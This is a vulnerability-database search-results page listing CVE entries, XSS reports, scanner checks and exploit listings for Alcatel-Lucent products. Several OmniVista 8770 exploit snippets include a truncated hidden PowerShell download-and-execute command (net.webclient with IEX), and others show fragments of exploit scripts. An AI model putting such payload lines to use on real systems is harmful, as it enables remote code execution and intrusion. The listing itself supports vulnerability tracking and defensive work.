Lucene search
+L

251 matches found

exploitdb
exploitdb
added 2019/02/28 12:0 a.m.116 views

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

!/usr/bin/python3 import argparse import requests import urllib.parse import binascii import re def runtarget: """ Execute exploitation """ We're using CVE-2018-10561 and/or it's extension in order to exploit this Authenticated RCE in usbForm method of GPON ONT. We can also exploit this issue aft...

9.8CVSS9.6AI score0.92887EPSS
Exploits7
exploitpack
exploitpack
added 2019/02/28 12:0 a.m.275 views

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

Alcatel-Lucent Nokia GPON I-240W-Q - Buffer Overflow !/usr/bin/python3 import argparse import requests import urllib.parse import binascii import re def runtarget: """ Execute exploitation """ We're using CVE-2018-10561 and/or it's extension in order to exploit this Authenticated RCE in usbForm...

7.5CVSS0.8AI score0.92887EPSS
Exploits7
nvd
nvd
added 2017/08/09 6:29 p.m.13 views

CVE-2015-6498

Alcatel-Lucent Home Device Manager before 4.1.10, 4.2.x before 4.2.2 allows remote attackers to spoof and make calls as target devices...

7.5CVSS7.5AI score0.0219EPSS
Exploits0References3
prion
prion
added 2017/08/09 6:29 p.m.12 views

Code injection

Alcatel-Lucent Home Device Manager before 4.1.10, 4.2.x before 4.2.2 allows remote attackers to spoof and make calls as target devices...

5CVSS7.2AI score0.0219EPSS
Exploits0References3Affected Software1
cvelist
cvelist
added 2017/08/09 6:0 p.m.18 views

CVE-2015-6498

Alcatel-Lucent Home Device Manager before 4.1.10, 4.2.x before 4.2.2 allows remote attackers to spoof and make calls as target devices...

7.5AI score0.0219EPSS
Exploits0References3
cve
cve
added 2017/08/09 6:0 p.m.45 views

CVE-2015-6498

Affected product: Alcatel-Lucent Home Device Manager before 4.1.10 and 4.2.x before 4.2.2. Vulnerability: remote attackers can spoof and make calls as target devices. Root cause details are not provided beyond the spoofing capability. Impact: enables spoofing of calls to target devices. Remediati...

7.5CVSS7.5AI score0.0219EPSS
Exploits0References3Affected Software1
nvd
nvd
added 2017/03/23 8:59 p.m.22 views

CVE-2015-8687

Multiple cross-site scripting XSS vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager HDM before 4.2 allow remote attackers to inject arbitrary web script or HTML via the 1 deviceTypeID parameter to DeviceType/getDeviceType.do; the 2 policyActionClass or 3...

5.4CVSS5.5AI score0.00637EPSS
Exploits1References1
prion
prion
added 2017/03/23 8:59 p.m.20 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager HDM before 4.2 allow remote attackers to inject arbitrary web script or HTML via the 1 deviceTypeID parameter to DeviceType/getDeviceType.do; the 2 policyActionClass or 3...

3.5CVSS6AI score0.00637EPSS
Exploits1References1Affected Software1
cvelist
cvelist
added 2017/03/23 8:0 p.m.24 views

CVE-2015-8687

Multiple cross-site scripting XSS vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager HDM before 4.2 allow remote attackers to inject arbitrary web script or HTML via the 1 deviceTypeID parameter to DeviceType/getDeviceType.do; the 2 policyActionClass or 3...

5.5AI score0.00637EPSS
Exploits1References1
cve
cve
added 2017/03/23 8:0 p.m.49 views

CVE-2015-8687

The CVE-2015-8687 lies in the Alcatel-Lucent Motive Home Device Manager (HDM) Management Console, with multiple reflected XSS vulnerabilities in HDM

5.4CVSS5.4AI score0.00637EPSS
Exploits1References1Affected Software1
openbugbounty
openbugbounty
added 2016/12/29 7:9 a.m.10 views

market.alcatel-lucent.com XSS vulnerability

Vulnerable URL: https://market.alcatel-lucent.com/release/SPForgottenPwdFormSvlt Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 09:46 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated V...

6.3AI score
Exploits0
openvas
openvas
added 2016/12/23 12:0 a.m.96 views

Alcatel Lucent Omnivista 8770 RCE Vulnerability - Active Check

Alcatel Lucent Omnivista 8770 is prone to a remote command execution RCE vulnerability. SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

10CVSS9.6AI score0.13356EPSS
Exploits4References2
openvas
openvas
added 2016/12/22 12:0 a.m.24 views

Alcatel-Lucent Omnivista Detection (HTTP)

HTTP based detection of Alcatel-Lucent Omnivista. SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

7.1AI score
Exploits0References1
zdt
zdt
added 2016/12/08 12:0 a.m.22 views

Alcatel Lucent Omnivista 8770 Remote Code Execution Exploit

Exploit for windows platform in category remote exploits import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...

0.2AI score
Exploits0
seebug
seebug
added 2016/12/06 12:0 a.m.36 views

Alcatel Lucent Omnivista 8770 Remote Code Execution(CVE-2016-9796)

No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

10CVSS9.2AI score0.13356EPSS
Exploits4
zdt
zdt
added 2016/12/05 12:0 a.m.70 views

Alcatel Lucent Omnivista 8770 - Remote Code Execution Exploit

Exploit for windows platform in category remote exploits import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...

10CVSS9.2AI score0.13356EPSS
Exploits4
exploitdb
exploitdb
added 2016/12/04 12:0 a.m.61 views

Alcatel Lucent Omnivista 8770 - Remote Code Execution

import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2016/12/04 12:0 a.m.16 views

Alcatel Lucent Omnivista 8770 - Remote Code Execution

Alcatel Lucent Omnivista 8770 - Remote Code Execution import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...

0.5AI score
Exploits0
prion
prion
added 2016/12/03 6:59 a.m.18 views

Authentication flaw

Alcatel-Lucent OmniVista 8770 2.0 through 3.0 exposes different ORBs interfaces, which can be queried using the GIOP protocol on TCP port 30024. An attacker can bypass authentication, and OmniVista invokes methods AddJobSet, AddJob, and ExecuteNow that can be used to run arbitrary commands on the...

10CVSS7.6AI score0.13356EPSS
Exploits4References5Affected Software1
nvd
nvd
added 2016/12/03 6:59 a.m.18 views

CVE-2016-9796

Alcatel-Lucent OmniVista 8770 2.0 through 3.0 exposes different ORBs interfaces, which can be queried using the GIOP protocol on TCP port 30024. An attacker can bypass authentication, and OmniVista invokes methods AddJobSet, AddJob, and ExecuteNow that can be used to run arbitrary commands on the...

10CVSS9.7AI score0.13356EPSS
Exploits4References5
Rows per page
Query Builder